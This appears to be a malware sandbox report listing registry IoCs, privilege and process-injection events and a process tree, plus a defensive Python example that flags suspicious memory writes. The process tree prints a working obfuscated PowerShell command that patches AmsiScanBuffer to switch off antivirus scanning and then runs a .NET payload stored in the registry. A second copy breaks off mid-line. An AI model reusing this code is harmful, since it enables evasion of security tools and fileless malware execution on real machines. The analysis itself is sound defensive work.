Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\1e\52C64B7E | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | sysmon.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 20 Mar 2023 12:08:22 GMT" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | sysmon.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
Modifies registry class 30 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\system32\inetcpl.cpl,-4312#immutable1 = "Internet Options" | RuntimeBroker.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\SensorsCpl.dll,-1#immutable1 = "Location Settings" | RuntimeBroker.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\mmsys.cpl,-300#immutable1 = "Sound" | RuntimeBroker.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | RuntimeBroker.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\srchadmin.dll,-601#immutable1 = "Indexing Options" | RuntimeBroker.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\intl.cpl,-3#immutable1 = "Region" | RuntimeBroker.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\SyncCenter.dll,-3000#immutable1 = "Sync Center" | RuntimeBroker.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\system32\colorcpl.exe,-6#immutable1 = "Color Management" | RuntimeBroker.exe
Key created | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance | Explorer.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E | RuntimeBroker.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\Speech\SpeechUX\speechuxcpl.dll,-1#immutable1 = "Speech Recognition" | RuntimeBroker.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\accessibilitycpl.dll,-10#immutable1 = "Ease of Access Center" | RuntimeBroker.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\fvecpl.dll,-47#immutable1 = "Device Encryption" | RuntimeBroker.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\telephon.cpl,-1#immutable1 = "Phone and Modem" | RuntimeBroker.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\WasEverActivated = "1" | sihost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\system32\Vault.dll,-1#immutable1 = "Credential Manager" | RuntimeBroker.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\system32\FirewallControlPanel.dll,-12122#immutable1 = "Windows Firewall" | RuntimeBroker.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\systemcpl.dll,-1#immutable1 = "System" | RuntimeBroker.exe
Key created | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings | firefox.exe
Key created | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings | RuntimeBroker.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\main.cpl,-102#immutable1 = "Keyboard" | RuntimeBroker.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\system32\RADCUI.dll,-15300#immutable1 = "RemoteApp and Desktop Connections" | RuntimeBroker.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\sud.dll,-1#immutable1 = "Default Programs" | RuntimeBroker.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\fhcpl.dll,-52#immutable1 = "File History" | RuntimeBroker.exe
Key created | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache | RuntimeBroker.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\recovery.dll,-101#immutable1 = "Recovery" | RuntimeBroker.exe
Key created | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\SplashScreen | Explorer.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\hgcpl.dll,-1#immutable1 = "HomeGroup" | RuntimeBroker.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance | Explorer.EXE
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid  Process  (64 rows, grouped by process in order of first appearance)
4192  WinUIUpdate.exe  (10 rows)
4616  powershell.exe  (3 rows)
4068  powershell.exe  (3 rows)
1800  powershell.EXE  (4 rows)
4360  powershell.EXE  (2 rows)
2500  dllhost.exe  (12 rows)
1208  WerFault.exe  (15 rows, interleaved with 1136)
1136  WerFault.exe  (15 rows, interleaved with 1208) -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid  Process
3148  Explorer.EXE -
Suspicious behavior: LoadsDriver 6 IoCs
pid  Process
4  Process not Found  (5 rows)
632  Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description  pid  Process  (64 rows, grouped by process in the order the report lists them)
4616 powershell.exe: Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
4276 powercfg.exe: Token: SeShutdownPrivilege, SeCreatePagefilePrivilege
4068 powershell.exe: Token: SeDebugPrivilege
4584 powercfg.exe: Token: SeShutdownPrivilege, SeCreatePagefilePrivilege
4916 powercfg.exe: Token: SeShutdownPrivilege, SeCreatePagefilePrivilege
1308 powercfg.exe: Token: SeShutdownPrivilege, SeCreatePagefilePrivilege
4068 powershell.exe: Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
4068 powershell.exe (second pass): Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege -
Suspicious use of FindShellTrayWindow 35 IoCs
pid  Process  (35 rows, grouped by process)
1008  dwm.exe  (23 rows)
3148  Explorer.EXE  (7 rows)
2600  firefox.exe  (4 rows)
3032  ApplicationFrameHost.exe  (1 row) -
Suspicious use of SendNotifyMessage 64 IoCs
pid  Process
3148  Explorer.EXE  (64 rows) -
Suspicious use of SetWindowsHookEx 5 IoCs
pid  Process
3148  Explorer.EXE
2600  firefox.exe
3032  ApplicationFrameHost.exe
3148  Explorer.EXE
2096  SystemSettings.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid  Process
3660  RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description  pid  Process  procid_target  (64 rows, grouped by writing process; the number in parentheses is the report's procid_target index, not a PID)
PID 4444 cmd.exe wrote to memory of 4628 (75), 3652 (77), 4656 (79), 2948 (82), 3756 (83), 3200 (84), 5000 (85), 4352 (86), 4200 (87), 5044 (88); each target appears twice
PID 1388 cmd.exe wrote to memory of 4276 (76), 4584 (78), 4916 (80), 1308 (81); each target appears twice
PID 4192 WinUIUpdate.exe wrote to memory of 5032 (90)
PID 1800 powershell.EXE wrote to memory of 2500 (95); nine rows
PID 2500 dllhost.exe wrote to memory of 604 (3), 664 (1), 764 (21), 920 (17), 1008 (10), 380 (11), 728 (15), 416 (12), 1052 (13), 1100 (16), 1152 (18), 1168 (20), 1184 (22), 1312 (24), 1412 (25), 1428 (26), 1444 (27), 1488 (28), 1568 (29), 1608 (31), 1624 (30), 1744 (35), 1752 (33), 1828 (32), 1864 (34), 1880 (36) -
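Added example, not part of the sandbox report: the WriteProcessMemory rows above split into ordinary parent-to-child writes (cmd.exe 4444 and 1388 feeding their sc.exe, reg.exe and powercfg.exe children) and a fan-out from dllhost.exe 2500 into winlogon.exe, lsass.exe and most service hosts. The Python below parses a constructed subset of those rows in the report's own row format, rebuilds the writer-to-target graph and flags the two patterns a detection engineer would alert on. The PID-to-image map is copied from the process tree further down; the sensitive-process list and the fan-out threshold are this example's assumptions.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the "Suspicious use of WriteProcessMemory" rows
# above, in the report's row format. The trailing number is the sandbox's
# internal procid_target index, not a PID, and is ignored.
SAMPLE_ROWS = """
PID 4444 wrote to memory of 4628 4444 cmd.exe 75
PID 4444 wrote to memory of 4628 4444 cmd.exe 75
PID 1388 wrote to memory of 4276 1388 cmd.exe 76
PID 4192 wrote to memory of 5032 4192 WinUIUpdate.exe 90
PID 1800 wrote to memory of 2500 1800 powershell.EXE 95
PID 2500 wrote to memory of 604 2500 dllhost.exe 3
PID 2500 wrote to memory of 664 2500 dllhost.exe 1
PID 2500 wrote to memory of 1052 2500 dllhost.exe 13
"""

# PID -> image name, copied from the process tree later in the report.
IMAGES = {
    604: "winlogon.exe", 664: "lsass.exe", 1052: "svchost.exe", 1388: "cmd.exe",
    1800: "powershell.EXE", 2500: "dllhost.exe", 4192: "WinUIUpdate.exe",
    4276: "powercfg.exe", 4444: "cmd.exe", 4628: "sc.exe", 5032: "dialer.exe",
}

# "PID <writer> wrote to memory of <target> <writer> <image> <procid_target>"
ROW = re.compile(r"PID (\d+) wrote to memory of (\d+) \1 (\S+) \d+")

# Assumed list of processes that no script host or COM surrogate should open for write.
SENSITIVE = {"lsass.exe", "winlogon.exe", "csrss.exe", "services.exe"}


def parse_rows(text):
    """Return (writer_pid, writer_image, target_pid) per row; malformed rows are skipped."""
    out = []
    for line in text.strip().splitlines():
        m = ROW.match(line.strip())
        if m:
            out.append((int(m.group(1)), m.group(3), int(m.group(2))))
    return out


def write_graph(rows):
    """writer PID -> set of distinct target PIDs (duplicate rows collapse)."""
    graph = defaultdict(set)
    for writer, _, target in rows:
        graph[writer].add(target)
    return dict(graph)


def writes_into_sensitive(rows, images):
    """Rows whose target is a sensitive system process."""
    hits = []
    for writer, image, target in rows:
        target_image = images.get(target, "?")
        if target_image in SENSITIVE:
            hits.append((writer, image, target, target_image))
    return hits


def fan_out_writers(rows, min_targets):
    """Writers that touched at least min_targets distinct processes.

    A parent writing startup data into its own children stays at one target
    per child, so a low threshold already separates cmd.exe from dllhost.exe here.
    """
    return sorted(pid for pid, targets in write_graph(rows).items() if len(targets) >= min_targets)


if __name__ == "__main__":
    rows = parse_rows(SAMPLE_ROWS)
    for hit in writes_into_sensitive(rows, IMAGES):
        print("write into sensitive process:", hit)
    print("fan-out writers:", fan_out_writers(rows, 3))
```

On real telemetry (Sysmon event 10 or an EDR's process-access feed) the same two checks apply unchanged: the writer-to-target graph is what separates a shell launching children from a surrogate process seeding code into every service host it can open.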
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
[1] C:\Windows\system32\lsass.exe  |  cmd: C:\Windows\system32\lsass.exe  |  PID 664
[1] C:\Windows\system32\winlogon.exe  |  cmd: winlogon.exe  |  PID 604
  [2] C:\Windows\system32\dwm.exe  |  cmd: "dwm.exe"  |  PID 1008
      - Suspicious use of FindShellTrayWindow
  [2] C:\Windows\System32\dllhost.exe  |  cmd: C:\Windows\System32\dllhost.exe /Processid:{e334abd6-6cc0-45a5-b865-fa6a4bda805f}  |  PID 2500
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
[1] c:\windows\system32\svchost.exe  |  cmd: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts  |  PID 380
[1] c:\windows\system32\svchost.exe  |  cmd: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService  |  PID 416
[1] c:\windows\system32\svchost.exe  |  cmd: c:\windows\system32\svchost.exe -k netsvcs -s Schedule  |  PID 1052
  [2] c:\windows\system32\taskhostw.exe  |  cmd: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}  |  PID 2940
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:xHRyIsOXIgCy{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fEhNMJksXFrLti,[Parameter(Position=1)][Type]$jusdMtPRmM)$enbTzBIlykA=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+'fl'+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+'D'+''+'e'+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+''+'e'+''+[Char](109)+'o'+'r'+'y'+'M'+''+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+[Char](121)+'pe',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+'Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+','+''+'S'+''+[Char](101)+''+[Char](97)+'le'+'d'+''+[Char](44)+''+'A'+'ns'+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+'Cl'+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$enbTzBIlykA.DefineConstructor(''+'R'+''+'T'+''+'S'+''+'p'+''+'e'+''+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+',H'+[Char](105)+''+[Char](100)+'eBy'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+'l'+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fEhNMJksXFrLti).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+'M'+''+[Char](97)+'na'+[Char](103)+'ed');$enbTzBIlykA.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+'k'+[Char](101)+'','Pu'+[Char](98)+''+[Char](108)+''+'i'+''+'c'+','+[Char](72)+'i'+'d'+''+'e'+'B'+'y'+''+[Char](83)+''+'i'+'g'+[Char](44)+''+'N'+'ew'+
[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+'r'+'t'+''+'u'+'a'+[Char](108)+'',$jusdMtPRmM,$fEhNMJksXFrLti).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'ti'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+'g'+'e'+[Char](100)+'');Write-Output $enbTzBIlykA.CreateType();}$OGkjHErnAidyj=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+'t'+''+[Char](101)+'m'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType('Mi'+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+'Wi'+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+'U'+'n'+[Char](115)+''+'a'+''+[Char](102)+'eO'+[Char](71)+''+[Char](107)+'jHE'+'r'+'n'+'A'+'i'+'d'+'y'+'j'+'');$JrEheVpqUQJsVV=$OGkjHErnAidyj.GetMethod(''+[Char](74)+'rE'+[Char](104)+''+'e'+''+[Char](86)+''+[Char](112)+'q'+'U'+''+[Char](81)+'J'+'s'+''+'V'+''+[Char](86)+'',[Reflection.BindingFlags]'Pu'+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](116)+''+'a'+''+'t'+'i'+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$wItFnNBupUOBXHEpyWH=xHRyIsOXIgCy @([String])([IntPtr]);$sxZoNIXqazoJNGqdvqMBkv=xHRyIsOXIgCy 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aMYwWYNLcNc=$OGkjHErnAidyj.GetMethod(''+[Char](71)+'et'+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+[Char](97)+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+'2.'+[Char](100)+''+'l'+''+[Char](108)+'')));$BxQxYRNlFhiWeU=$JrEheVpqUQJsVV.Invoke($Null,@([Object]$aMYwWYNLcNc,[Object](''+'L'+''+'o'+''+[Char](97)+''+'d'+''+'L'+''+[Char](105)+''+'b'+'r'+[Char](97)+'ry'+[Char](65)+'')));$GpZabUyBODTkoBeoN=$JrEheVpqUQJsVV.Invoke($Null,@([Object]$aMYwWYNLcNc,[Object](''+'V'+''+[Char](105)+''+'r'+''+'t'+'u'+[Char](97)+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+''+'c'+'t')));$yOzDmLs=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BxQxYRNlFhiWeU,$wItFnNBupUOBXHEpyWH).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](46)+'d'+[Char](108)+'l');$cpLXoFEcHsvSGBtKu=$JrEheVpqUQJsVV.Invoke($Null,@([Object]$yOzDmLs,[Object](''+[Char](65)+''+[Char](109)+'si'+[Char](83)+'ca'+[Char](110)+''+[Char](66)+'u'+[Char](102)+''+[Char](102)+''+'e'+'r')));$gifkQTmckc=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GpZabUyBODTkoBeoN,$sxZoNIXqazoJNGqdvqMBkv).Invoke($cpLXoFEcHsvSGBtKu,[uint32]8,4,[ref]$gifkQTmckc);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$cpLXoFEcHsvSGBtKu,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GpZabUyBODTkoBeoN,$sxZoNIXqazoJNGqdvqMBkv).Invoke($cpLXoFEcHsvSGBtKu,[uint32]8,0x20,[ref]$gifkQTmckc);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+'RE').GetValue(''+'d'+''+'i'+'a'+'l'+''+'e'+''+[Char](114)+''+'s'+'t'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$N
ull)2⤵
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID 4360
    [3] C:\Windows\System32\Conhost.exe  |  cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1  |  PID 2680
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:IZvLNQxByUyB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$rTqGxIQPGJiKza,[Parameter(Position=1)][Type]$oPLoUAlLzn)$KLkqgjJOoHS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+'d'+'Del'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'yM'+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+'l'+[Char](101)+'ga'+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+'a'+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+'c,'+'S'+''+'e'+''+'a'+''+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+','+'A'+'u'+''+'t'+'oC'+[Char](108)+''+[Char](97)+''+'s'+'s',[MulticastDelegate]);$KLkqgjJOoHS.DefineConstructor('R'+[Char](84)+'Sp'+[Char](101)+'c'+'i'+''+[Char](97)+'lNa'+'m'+''+[Char](101)+','+[Char](72)+''+'i'+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+'bl'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$rTqGxIQPGJiKza).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+[Char](44)+''+[Char](77)+''+'a'+'na'+'g'+''+'e'+''+[Char](100)+'');$KLkqgjJOoHS.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+'o'+''+[Char](107)+'e',''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+'
